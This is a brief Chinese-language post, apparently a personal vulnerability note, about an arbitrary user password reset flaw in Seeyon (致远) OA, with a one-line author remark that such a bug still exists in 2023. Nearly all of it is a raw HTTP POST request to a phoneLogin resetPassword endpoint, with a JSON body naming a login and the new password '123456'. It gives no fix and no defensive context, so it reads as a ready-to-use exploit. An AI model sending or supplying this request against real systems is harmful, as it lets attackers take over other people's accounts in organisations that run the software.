Quan

致远OA任意用户密码重置

我实在没想到，2023年居然还有这种漏洞的存在...我啥时候也能挖掘这么个漏洞出来哇...
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip

{"loginName":"XXX321123XXX”,”password":"123456"}